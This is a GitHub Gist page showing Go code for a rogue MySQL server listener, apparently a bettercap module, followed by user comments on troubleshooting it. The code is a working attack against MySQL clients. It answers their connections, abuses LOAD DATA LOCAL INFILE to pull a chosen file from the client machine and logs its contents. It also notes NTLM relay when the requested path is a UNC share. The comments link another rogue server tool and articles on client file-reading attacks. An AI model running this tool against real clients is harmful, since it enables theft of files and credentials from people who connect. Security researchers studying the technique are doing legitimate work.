-
-
Save bmaia/adc503231ffff19a77aaf0c7abd2e895 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for mysql.Running() { | |
| // tcp listener | |
| conn, err := mysql.listener.AcceptTCP() | |
| if err != nil { | |
| log.Warning("Error while accepting TCP connection: %s", err) | |
| continue | |
| } | |
| // send the mysql greeting | |
| conn.Write([]byte(MySQLGreeting)) | |
| // read the incoming responses and retrieve infile | |
| // TODO: include binary support and files > 16kb | |
| b := make([]byte, 16384) | |
| bufio.NewReader(conn).Read(b) | |
| // parse client capabilities and validate connection | |
| // TODO: parse mysql connections properly and | |
| // display additional connection attributes | |
| clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8))) | |
| if len(clientCapabilities) == 16 { | |
| remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0] | |
| log.Info("MySQL connection from: %s", remoteAddress) | |
| loadData := string(clientCapabilities[8]) | |
| log.Info("Can Use LOAD DATA LOCAL: %s", loadData) | |
| username := bytes.Split(b[36:], []byte{0})[0] | |
| log.Info("MySQL Login Request Username: %s", username) | |
| // send initial responseOK | |
| conn.Write([]byte(FirstResponseOK)) | |
| bufio.NewReader(conn).Read(b) | |
| conn.Write([]byte(GetFile)) | |
| infileLen, err := bufio.NewReader(conn).Read(b) | |
| if err != nil { | |
| log.Warning("Error while reading buffer: %s", err) | |
| continue | |
| } | |
| // check if the infile is an UNC path | |
| if strings.HasPrefix(mysql.infile, "\\") { | |
| log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile) | |
| } else { | |
| // print the infile content, ignore mysql protocol headers | |
| // TODO: include binary support and output to a file | |
| log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4]) | |
| } | |
| // send additional response | |
| conn.Write([]byte(SecondResponseOK)) | |
| bufio.NewReader(conn).Read(b) | |
| } | |
| defer conn.Close() | |
| (...) |
ok i'll give it a try. I did first try https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py but it spat a lot of exceptions and reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try as everything was integrated
#python rogue_mysql_server.py
error: uncaptured python exception, closing channel <__main__.http_request_handler connected 10.10.10.187:49106 at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/asyncore.py|read|83] [/usr/lib/python2.7/asyncore.py|handle_read_event|449] [/usr/lib/python2.7/asynchat.py|handle_read|147] [rogue_mysql_server.py|found_terminator|184])
Just to let you know that your module works great, and that i was to blame.The error came from a malformed sql query
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You can try to use other Rogue MySQL clients like the one below:
https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py
The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD INDATA, check the mysql packets and try to replay them (see the snippets below for an example):
https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py#L112-L114
The post below is a good (and more recent) reference:
https://medium.com/@knownsec404team/mysql-client-arbitrary-file-reading-attack-chain-extension-727bb63f578c